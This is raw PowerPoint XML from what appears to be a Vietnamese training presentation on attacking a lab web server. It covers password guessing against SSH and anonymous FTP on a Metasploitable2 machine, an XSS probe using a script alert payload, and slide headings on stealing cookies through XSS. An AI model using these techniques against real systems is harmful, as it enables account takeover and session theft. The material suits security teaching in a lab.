        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27964036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82FC3-AF22-FE86-D4F7-FD05BA119F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247E848-A405-3E0A-D718-9B728EADA6B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0D91E08-B2A0-E937-36D5-02B07E8EA67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182</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5077249-3307-AFFC-1D8A-8CA849ABF75F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31748" y="14883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Sau một thời gian thử các mật khẩu  thì ta tìm được password của tài khoản user trong dịch vụ SSH là : live.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FC3A5C9-F677-4A99-0026-9609DCFEFA93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-93793" y="1459419"/>
            <a:ext cx="9166481" cy="3893608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42521875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CC20F-8DFE-1E28-4FF2-F69DEF4171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1ED70B8-3BF4-125A-D58B-5D400A884D6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1A10DD5-3C6A-CD93-9463-68A7AB94E14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183</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A42EBA-8891-EB4F-022A-7E09211BA2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31748" y="148833"/>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Ngoài dịch vụ này ta cũng có thể tấn công dịch vụ ftp của máy Metaploitable2-linux có ip 192.168.164.129 bằng cách khai thác mật khẩu tài khoản anonymous qua câu lệnh:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAB8B448-8850-B9AB-9875-320C84AEBF34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="358251" y="2286001"/>
            <a:ext cx="8299717" cy="1142997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37049791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93843-C52F-7CBD-2A6F-F44CC159D4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73D0880-F618-E102-93EC-C0D8ACBA9BE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6F3630F-6403-D551-C6D8-0852E56CD69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184</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FD53A79-A9EF-3A31-C152-BDB5991C5CE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31748" y="148833"/>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Kết </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{310C8BBE-9CF8-E772-2B06-FD07BF5BA41D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="30954"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="145997" y="1123928"/>
            <a:ext cx="8852006" cy="40291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36459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A4CFA-08D3-7A70-0C6C-DC710C565C6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33A411F-82B9-BD25-5FD3-86EF2CC2F72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81F05B2C-8188-BF99-34F5-CF7A997818B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185</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C379A378-FE80-FB9B-BFF1-E7A5D45D2A21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1485900"/>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Thăm dò Khả năng Tấn công XSS </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1"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Trêm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> ứ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ng dụng Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>công,Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mở</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>duyệt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>truy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>địa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nhân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> 192.168.164.132 </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D756438-BA40-76DA-546B-B5FF158F2902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="3009900"/>
            <a:ext cx="6934200" cy="3060967"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D44C734C-8EB4-2428-2B1C-4F8727E11E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="105584"/>
            <a:ext cx="8489949" cy="1938992"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>3.4.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Quy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>diện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>WebServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41345552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4B54D-DFE8-240C-4A88-AE2A1B2CA0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4F831BF-474A-307E-0302-9B32C6E8449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050CA508-E476-2B9C-D5BA-B3B46151FB0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186</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{241786DA-332A-A51A-B979-DD38CB2FCEE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="133349" y="647700"/>
            <a:ext cx="8877301" cy="3780493"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26929293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7485D-89BC-BEAA-A1AA-2750C188A08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089962C-C634-DBBC-B225-5531879F8EB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16E2FF1D-0BA9-AC19-AA5B-63E08C550D6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187</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F056884-D39F-CFF6-5D62-D01C8813243E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Để kiểm tra lỗ hổng, Attacker chèn một lệnh JavaScript đơn giản vào trường Text: &lt;script&gt;alert("Da ja hao!!!")&lt;/script&gt;. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA7AA7A-FA1A-0738-C54F-5EF1D3F3A5C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1594027"/>
            <a:ext cx="8686800" cy="4120973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38179488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81DD2-6705-E68F-76A8-E83B89CAFDF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FF9EACB-E5DF-78A5-F9C3-253DB95FE3F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B37A6880-6952-0601-9F63-82100FB64FD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188</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED349688-E3E1-CBD0-442B-543FC1387ABC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Tấn công XSS để lấy Cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{645BDA74-B026-DA72-F03B-90B2233755A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="653949" y="1181100"/>
            <a:ext cx="7876005" cy="1447795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42790961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3B040-D4EC-C950-6055-F533AA15B17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FE3A82B-B16B-3350-76CE-AD0678F62D3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3EDB0822-E57D-A6D5-8F0D-389ABA5DCF0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189</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB97952B-3B1A-6F3D-5E1B-D001FB5D0B1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Bước 2: Tấn công XSS để lấy Cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56254AE9-7EAF-DC68-6DAE-573B445F84A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="127000" y="1028699"/>
            <a:ext cx="8807312" cy="4190999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102654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92E3E-77E5-4FC8-23ED-E7BDEE08A02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68250A-1CE4-DA26-AE08-ACC21B35F036}"/>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F34FE45-BD6E-777C-9C6B-8E1A2C5CD3EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>1.3.2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>chính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> OWASP Top 10-2021</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8873C486-0FC1-DA46-4AC6-7A3C5D1965B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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
